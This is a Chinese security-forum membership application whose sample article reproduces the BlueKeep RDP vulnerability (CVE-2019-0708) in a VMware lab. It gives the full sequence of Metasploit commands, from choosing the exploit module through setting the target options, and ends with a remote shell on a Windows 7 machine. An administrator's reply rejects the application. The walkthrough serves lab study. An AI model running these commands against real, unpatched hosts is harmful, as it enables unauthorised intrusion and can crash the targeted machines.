吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3651|回复: 1
收起左侧

[会员申请] 申请会员ID:Moxin1044

[复制链接]
吾爱游客  发表于 2020-3-30 13:23
1、申 请 I D:Moxin1044
2、个人邮箱:1044631097@qq.com
3、原创技术文章:CVE-2019-0708漏洞复现
0x01前言:  我们今天来学习一下CVE-2019-0708漏洞的复现,这个复现还是比较简单的。但是某dalao告诉我是看脸。  我们使用的环境:      VMware Workstation Pro15.5Windows7SP1旗舰版(靶机)Kali linux 2020.1(攻击机)Windows10 2004 专业版(教程机)0x02复现教程从此正式开始:       001.png 执行:sudo msfconsole输入管理员密码然后进入msf 002.png 输入:search 0708 回车 003.png 我们需要使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce这个exp框架输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce回车(或者是use 3) 004.png 执行完成后,我们输入info,看下我们需要设置哪些参数。 005.png 我们需要设置RHOSTS,如果RPORT不是默认的3389,我们还需要设置它。然后我们需要设置target,设置的先后没有关系。我们现在看靶机,取出靶机的外网IP:192.168.146.129 006.png 我们直接set rhosts 192.168.146.129 回车 007.png setrport 3389 回车setForceExploit true(这个从Freebuf上吸取的经验,可以杜绝一定程度的蓝屏)我们设置一下target输入set target 5(因为我们的VMware版本是15.5,)我们输入run或者exploit(自我感觉没什么区别) 008.png 既然这样提示了,也就是成功的证明了这台机子是存在漏洞的。后面还没有回显消息,我们先稍微等待一下。 009.png 我们已经看到了这样的情况,下面有两行空的,我们直接回车。 010.png Ok,我们已经成功取得Shell。 011.png 成功回显信息,但是字符编码可能存在问题。如果存在其他的问题,那就是target设置的问题或者是开了防火墙,可以尝试几次。已知火绒会存在拦截。如果没有取到shell,并且该机子存在0708漏洞,那机子就是蓝屏了~~~

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2020-3-30 17:57
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 14:39

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表